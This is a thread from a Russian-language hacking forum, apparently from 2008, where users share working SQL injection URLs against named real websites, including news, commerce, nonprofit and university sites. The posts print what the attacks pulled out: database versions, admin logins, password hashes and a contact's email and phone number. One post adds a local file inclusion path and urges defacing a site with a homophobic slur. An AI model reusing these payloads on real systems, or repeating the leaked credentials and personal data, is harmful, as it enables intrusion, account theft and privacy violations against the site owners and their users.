ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5651  
Старый 08.06.2008, 17:33
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от baltazar  
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1 
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
=(( многоразовый боян.

юзай
http://filefront.jino-net.ru/sql.html
 
Ответить с цитированием

  #5652  
Старый 08.06.2008, 20:51
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

nexia.com
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-community-ntnexiausr@localhostnexia
Код:
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat(username,0x3,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+tmembers+limit+0,1/*
estudiogior5ar
 
Ответить с цитированием

  #5653  
Старый 08.06.2008, 20:57
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Pogoda.ua. Погода в Украине и мире. Погода в Киеве. Прогноз погоды на 10 дней

Цитата:
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,ema il),3,4,5+from+users+limit+0,1/*
test:test:test@localhost.com
 
Ответить с цитированием

  #5654  
Старый 08.06.2008, 21:46
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

globaleconomicgovernance.org
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7/*
5.0.45-logdbo158065722@212.227.118.42db158065722
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,unhex(hex(concat_ws(0x3,userloginname,userpassword))),3,4,5,6,7+from+upload_users/*
test_user32570e9ad6d773db0af65ac057c5e4a7f
 
Ответить с цитированием

  #5655  
Старый 08.06.2008, 21:46
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от КВР  
Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru
Ахха, надо дефейсануть этот сайт и написать от Отара Кушанашвили:
Рудковская гений. Билан - Лучший певец. Только ПИДАРАЗ!
 
Ответить с цитированием

  #5656  
Старый 08.06.2008, 23:08
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

torg.ua
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=1/*
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=2/*
Смотрите разницу . Инъекция вывода не имеет, но можно посимвольно брутить, сбрутил версию:
-> Try 30 .. 70 -> Char > 50
-> Try 50 .. 70 -> Char < 60
-> Try 50 .. 61 -> Char < 55
-> Try 50 .. 56 -> Char < 53
-> Try 50 -> NO =(
-> Try 51 -> NO =(
-> Try 52 -> FOUND!
-> Ascii: 52
-> Char: 4

Ничего хорошего, четверка
 
Ответить с цитированием

  #5657  
Старый 08.06.2008, 23:14
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

tribeca.org
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
5.0.24a-standard-logtribeca_user@apache2-blow.skoda.dreamhost.comtribecaorgnew
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat(admin,0x3,admin_pass),3,4,5,6,7,8+from+site_admin/*
adminadmin

mogadishni.com
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5/*
4.1.20-community-ntchr@localhostmogadishni
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,id,email,phone),2,3,4,5+from+contact+limit+2,1/*
4loeland@mogadishni.com+45 32543535
 
Ответить с цитированием

  #5658  
Старый 09.06.2008, 00:37
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

rfbd.ru - Телефонные Базы Данных г. Москва, Телефонные Справочники г. Москва, Паспортные Базы Данных г. Москва

Цитата:
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*
5.0.37-standard-log:a1rfbd_guest@localhost:a1rfbd_ric_datebase

Цитата:
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,table_name+from+information_schem a.columns+where+column_name=0x70617373776f7264/*
_cms_users


СоюзКредит.ру — быстрый денежный кредит, ипотека и автокредит

Цитата:
http://www.souscredit.ru/?p=4&cat=-1+union+select+1,concat_ws(0x3a,name,login,pass,ma il),3,4+from+users+where+id=1/*
admin:llirik:kirill:admin@souscredit.ru

Последний раз редактировалось ~!DoK_tOR!~; 09.06.2008 в 02:02..
 
Ответить с цитированием

  #5659  
Старый 09.06.2008, 02:14
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

На сладенькое немного .edu
Код:
http://www.ub.edu/crai/pharmakoteka/registre.php?id=-11+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.cpd.usu.edu/asset.php?id=-111+UNION+SELECT+1,table_name,table_name,table_name,5,6+from+information_schema.tables+limit+15,1/*

http://caxton.emich.edu/guide/guide.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8,9/*

http://math.ucsd.edu/people/profile.php?id=-111+UNION+SELECT+VERSION()/*

http://www.stots.edu/article.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
 
Ответить с цитированием

  #5660  
Старый 09.06.2008, 13:06
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

http://www.whitleyaward.org/display.php?id=-75+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13, 14,15,16,17 ,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33/
*

http://www.comicstriplibrary.org/display.php?id=-606+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,1 5,16,17,18,19/*

http://www.heroplay.com/features/articles/display.php?id=-27+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14 ,15,16,17 ,18,19,20,21/*

http://www.isdci.org/display.php?ID=-36+union+select+1,2 ,v ersi on(),4,5,6/*

http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12 ,13,14,1 5,16,17,18,19,20,21,2 2,23,24,25,26,27/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ